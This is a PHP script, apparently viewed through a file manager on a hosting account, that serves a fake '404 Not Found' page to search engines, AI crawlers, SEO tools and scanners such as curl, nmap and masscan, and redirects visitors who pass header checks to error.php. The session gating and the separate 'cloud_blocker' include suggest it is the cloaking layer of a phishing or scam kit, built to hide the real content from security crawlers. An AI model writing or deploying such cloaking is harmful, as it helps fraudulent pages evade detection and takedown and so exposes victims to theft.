File "index.php"

Full path: /home/algopkco/public_html/404-NotFounda/index.php
File size: 3.16 B (3.16 KB bytes)
MIME-type: text/x-php
Charset: utf-8

Download   Open   Edit   Advanced Editor &nnbsp; Back

<?php
session_start();
require __DIR__ . '/cloud_blocker.php';

$_SESSION['script_access_granted'] = true;
// Define the destination URL for REAL HUMAN visitors
$destination_url = 'error.php';

// --- Comprehensive Bot Signatures for Universal Blocking ---
$bot_signatures = [
    // 1. Major Search Engines & Crawlers (Explicitly blocking for 404)
    'googlebot', 'google', 'bingbot', 'bing', 'yandex', 'baidu', 'duckduckbot',
    'applebot', 'amazonbot', 'naver', 'facebot', 'linkedinbot', 'slurp',
    
    // 2. AI & LLM Crawlers (New category of aggressive crawlers)
    'gptbot', 'oai-searchbot', 'chatgpt-user', 'anthropic-ai', 'claudebot', 
    'perplexitybot', 'ccbot', 'diffbot', 'cohere-ai', 'mistralai-user',
    
    // 3. SEO & Competitive Intelligence Tools (Often aggressive/unwanted)
    'ahrefsbot', 'semrushbot', 'dotbot', 'majestic', 'screaming frog', 
    'rogerbot', 'siteaudit', 'trendictionbot', 'blexbot',
    
    // 4. Generic/Scripting Library Identifiers (Simple scrapers often use these defaults)
    'bot', 'crawl', 'spider', 'scraper', 'httpclient', 'python', 'java', 
    'go-http-client', 'curl', 'wget', 'libwww', 'axios', 'requests', 'php',
    'headlesschrome', 'phantomjs', 'selenium', 'zgrab', 'masscan', 'nmap',
    
    // 5. Miscellanous/Obscure/Aggregators
    'omgili', 'bytespider', 'archivebot', 'archive.org_bot', 'adbeat', 'acapbot',
    'blackwidow', 'butterfly', 'tompibot', 'youbot'
];

// --- Input Gathering ---

$user_agent = isset($_SERVER['HTTP_USER_AGENT']) ? strtolower($_SERVER['HTTP_USER_AGENT']) : '';
$is_bot = false;

// --- 1. User-Agent Sniffing Check ---

// If User-Agent is empty, it's a very simple script or tool
if (empty($user_agent)) {
    $is_bot = true;
    goto handle_request;
}

// Check for any signature match
foreach ($bot_signatures as $signature) {
    if (strpos($user_agent, $signature) !== false) {
        $is_bot = true;
        goto handle_request;
    }
}

// --- 2. Environmental/Header Integrity Check (Defense against Spoofing) ---
// This is critical to catch bots using fake (spoofed) standard browser User-Agents.

$accept_header = $_SERVER['HTTP_ACCEPT'] ?? '';
$accept_language_header = $_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? '';

// Check 2A: Is the Accept header missing or suspiciously short? (e.g., just */* or missing entirely)
if (empty($accept_header) || strlen($accept_header) < 10) {
    $is_bot = true;
    goto handle_request;
}

// Check 2B: Is the Accept-Language header completely missing? (A real browser usually sends one)
if (empty($accept_language_header)) {
    $is_bot = true;
    goto handle_request;
}

// --- Conditional Handling (Execution Block) ---
handle_request:

if ($is_bot) {
    // Block the bot with a 404
    header($_SERVER['SERVER_PROTOCOL'] . ' 404 Not Found');
    
    // Output the lightest possible 404 page
    echo '<!DOCTYPE html><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>';
    
    exit;
} else {
    // Redirect the human visitor
    header('Location: ' . $destination_url, true, 302);
    
    exit;
}
?>